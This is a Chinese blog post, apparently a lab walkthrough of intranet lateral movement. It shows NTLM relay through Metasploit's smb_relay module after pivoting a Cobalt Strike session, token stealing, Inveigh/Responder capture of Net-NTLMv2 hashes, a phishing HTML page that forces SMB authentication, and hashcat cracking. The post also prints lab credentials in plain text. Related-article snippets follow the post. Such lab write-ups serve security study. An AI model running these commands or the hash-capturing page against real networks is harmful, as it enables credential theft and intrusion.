内网渗透—横向移动&NTLM-Relay重放攻击&Responder中继攻击

已于 2024-09-09 23:48:39 修改
阅读量695 收藏 23
点赞数 23
分类专栏: 内网渗透 文章标签: NTLM-Relay Responder中继攻击 Inveigh嗅探
于 2024-08-24 02:18:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76227305/article/details/141464868
版权

前言

与NLTM认证相关的安全问题主要有Pass The Hash、利用NTLM进行信息收集、Net-NTLM Hash破解、NTLM Relay几种。PTH前往期文章复现,运用mimikatz、impacket工具包的一些脚本、CS等等都可以利用,NTLM Relay又包括(relay to smb,ldap,ews)可以应用在获取不到明文或HASH时采用的手法,但也要注意手法的必备条件。

实验环境

实验环境没有固定的了,有时候自己搭建的环境可以,有时候又不行。有时候小迪的环境可以,有时候也不行,哎,随遇而安吧。

kali:192.168.145.171
Web:192.168.145.138,192.168.22.31
PC:192.168.22.27

NTLM-Relay重放

NTLM-Relay可以通过smb、ldap、ews协议进行重放,这里就通过smb协议来进行重放实验。我们通过smb协议去远程访问主机的话,它是会拿你当前的账号密码去进行一个匹对。比如A主机的账号密码是admin/passwd,而B主机的账号密码也是admin/passwd,那么A主机就可以直接远程访问B主机。这是smb的特性,也是Relay攻击的前置条件,就是通讯的双方账户与密码是一致。

案例测试

主机的账号密码。

PC1
本地账号密码: .\administraotr:3143237103Aa
域账号密码:god\wlwznb:3143237103Aa

PC2
本地账号密码: .\administraotr:3143237103Aa
域账号密码:god\wlwnb666:3143237103Aa

当前PC1账号是wlwznb,我们远程访问一下PC2试试,显示拒绝访问的。

此时我们把PC1的账号切换为administrator,成功访问PC2主机,这是因为PC2中存在administrator的账号,而且密码也一样。

重放攻击

这里我们就要用到msf中的smb Relay攻击模块啦,先让web服务器上线CS。

因为要使用到msf的模块,所以得把会话转到msf,CS设置监听器。

msf设置如下。

CS执行命令,即可转义会话。

spawn 2222

会话过来后我们再添加一下路由,因为33是内网网段。

run post/multi/manage/autoroute

查看一下路由。

run autoroute -p

使用smb重放模块。

background
use exploit/windows/smb/smb_relay

设置参数。

use exploit/windows/smb/smb_relay
set smbhost 192.168.22.27   #攻击目标
set lhost 192.168.145.171   #设置本地 IP
set autorunscript post/windows/manage/migrate
set payload windows/meterpreter/bind_tcp  ##设置正向连接
set rhost 192.168.22.27 #设置连接目标
run

到我们的受控主机执行远程访问命令。

dir \\192.168.145.171\c$

这里拓展一下,有人可能会说万一人家登录的用户不是administrator咋办。其实你可以到CS上面去切换用户滴,PS命令找到本地用户的administrator进程,记下PID。

输入命令切换用户。

steal_token 3792

查看当前用户为administrator。

getuid

然而却是没有成功,不知道为啥没成功,但是返回了hash值。网上很多文章都未成功,不过也有说64位系统未成功,但是32位系统成功了,这里我也懒得换小迪的环境测试了,就这样吧。

如果没搞懂的话,我放个图你们就明白了,这个图是我从别人文章找来的。

Responder中继攻击

这个攻击手段就是攻击者在被控主机上伪造一个SMB服务器,当内网中有机器对被控主机进行SMB访问的时候,内网中的主机先访问攻击者伪造的SMB服务器,然后伪造的SMB服务器再将访问流量重放给被控主机,在这个过程中,内网主机是毫无感觉的,但是内网主机访问的用户的账号与密码的hash值均被伪造的SMB服务器获取。

Inveigh嗅探

工具下载:Inveigh:.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers - GitCode

工具下载之后是源码,自己编译成exe,然后上传到Web主机。

直接运行这个exe,我这里图方便直接在Web主机上执行命令了。

Inveigh.exe

此时远程访问Web主机,可以看到hash会被记录在inveigh-NTLMv2这个文件。

可以制作一个钓鱼网站,诱骗域内用户点击,那么用户的hash机会被我们所记录。

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.22.31">
</body>
</html>

hashcat破解

此时我们直接破解这个hash,这里使用hashcat这个工具去破解。

下载地址:https://github.com/hashcat/hashcat/

hashcat.exe -m 5600 1.txt pass.txt

总结

可以看到整个实验下来我是没有抓取hash或者密码的,但是仍可以成功横移的。

最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。

脸红ฅฅ*的思春期
关注
专栏目录
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&NTLM中继&Relay重放&SMB&EWS&LADP协议&强制认证&钓鱼监听
HACKONE的博客
06-25 154
NTLM Relay其实严格意义上并不能叫NTLM Relay,而是应该叫 Net-NTLM Relay。它是发生在NTLM认证的第三步,在 Type3 Response消息中存在Net-NTLM Hash,当攻击者获得了Net-NTLM Hash后,可以进行中间人攻击,重放Net-NTLM Hash,这种攻击手法也就是大家所说的NTLM Relay(NTLM 中继)攻击。2、利用Net-NTLM Hash中继攻击(Net NTLM Hash相同)#横向移动-NTLM中继-暴力破解&Relay攻击
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&PTH哈希&PTT票据&PTK密匙&Kerberoast攻击点&TGT&NTLM爆破
HACKONE的博客
06-23 177
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。生成票据文件:shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!PTH(pass the hash) #利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击
浅析域内NTLM Relay攻击
2401_84466229的博客
05-27 1028
NTLM Relay是一种中间人攻击的方式,一般而言都是被动攻击,等待连接操作,但PetitPotam的出现,发生了一些改变。正如上面实验,在两台域控都安装了ADCS的情况下,不需要被动等待即可发起攻击。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要。
内网安全-横向移动-NTLM中继攻击
weixin_63920195的博客
07-20 411
这两个是用在mimicatz获取明文hash失效的情况。
内网渗透测试:NTLM Relay攻击分析
qq_45521281的博客
02-21 1165
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录基础知识NTLM认证过程NTLM中继攻击原理获得Net-NTLM Relay的思路利用LLMNR和NetBIOS欺骗获得Net-NTLMHash利用WPAD劫持获得Net-NTLMHashSMB Relay(SMB中继攻击攻击演示Responder中的MultiRelay.pyImpacket中的smbrelayx.pyMetasp.
第134天:内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
weixin_71529930的博客
08-22 1017
本节案例适用于不能获得域控密码和hash的情况。
域渗透:ntlm relay攻击实验及攻击流程深度解析
最新发布
anddddoooo的博客
10-20 1068
这篇文章主要介绍ntlm relay攻击流程,以及作者在思考ntlm relay攻击时抛出的一些问题,和对这些问题的解决,先看一下ntlm relay攻击的过程客户:B 192.168.72.159服务器:A 192.168.72.174中间人(攻击者):C 192.168.72.162首先说明以下,ntlm作为底层协议,需要有其他高级协议的支持,比如说smb、http,ntlm嵌入这些协议里提供身份验证。
跟着玄武大佬学NTLM relay攻防
蚁景网安学院
05-06 613
0X01偶然间看到了玄武实验室在2018Zero Nights会议上的分享的议题《NtlmRelay Reloaded: Attack methods you do notknow》,身...
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4398
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTH: PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
2021-10-15NTLM中继攻击ntlm delay)
qq_45290991的博客
10-15 2393
终于结束了,虽然没有毕业后成为一名red进入鹅产,但是到了小产业也感觉很好。齐名虽然年轻,但是朝气蓬勃。 我觉得同事都很开心,搞渗透测试运维也不错驻场。 一、原理 1.1ntlm认证机制 参考资料:Windows本地认证和NTLM认证 总的来说就是windows下有2种认证机制,kerb和ntlmntlm又分为第一版本和第二版本),kb用于域内,一般是kb优先用,不行了域内才会开始用ntlm。win2000以后,ntlm认证方式的hash(密码)都会被存入到SAM文件中,域内会存入ntdl。tdl
内网渗透横向移动NTMLRelay(中继)攻击-Inveigh&NTLM-Relay重放
m0_62207170的博客
05-01 1126
内网渗透横向移动NTMLRelay(中继)攻击-Inveigh&NTLM-Relay重放
网络安全-内网渗透2
m0_68976043的博客
03-31 1416
我们是有一款工具hashcat专门破解net-HTLMv2-HashMD5的值不是破解出来的,是对明文对出来的md5在线解密破解,md5解密加密 (cmd5.com)但是对于破解net-HTLMv2-Hash概率很小。
134-横向移动-NTLM-Relay重放&Responder中继攻击&Ldap&Ews
DamnVanish的博客
08-24 601
一般场景下是配合钓鱼来使用的,毕竟谁会直接命令行进行连接
Inveigh结合DNS v6配合NTLM Relay 的利用
谢公子的博客
09-05 1147
Inveigh是一个跨平台的.NET IPv4/IPv6机器渗透测试工具。
NTLM-relay攻击的原理与实现
热门推荐
Shanfenglan's blog
09-28 16万+
CATALOGNTLM相关1.用处2.认证流程其他术语NT-hash/NTLM-hashLM-hashNet-NTLM hashSSPISSPNTLM-relay原理不同版本的NTLM认证对应的responseNTLM-relay攻击如何获取到NET-NTLM hash通过responder或者inveigh工具Inveighresponder破解NET-NTLM hash(v2)其它方式的NTLM-relay攻击利用impacket的ntlmrelayssmb协议访问:http协议访问参考文章 NTLM
Windows LM-Hash与NTLM-Hash详解及Python模拟
尽管现在NTLM Hash更为常用,但了解这两种哈希的生成过程对于理解Windows安全和内网渗透至关重要。 LM Hash是IBM设计的一种较老的哈希算法,其生成步骤如下: 1. **密码限制**:用户密码最多只能包含14个字符。 2....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值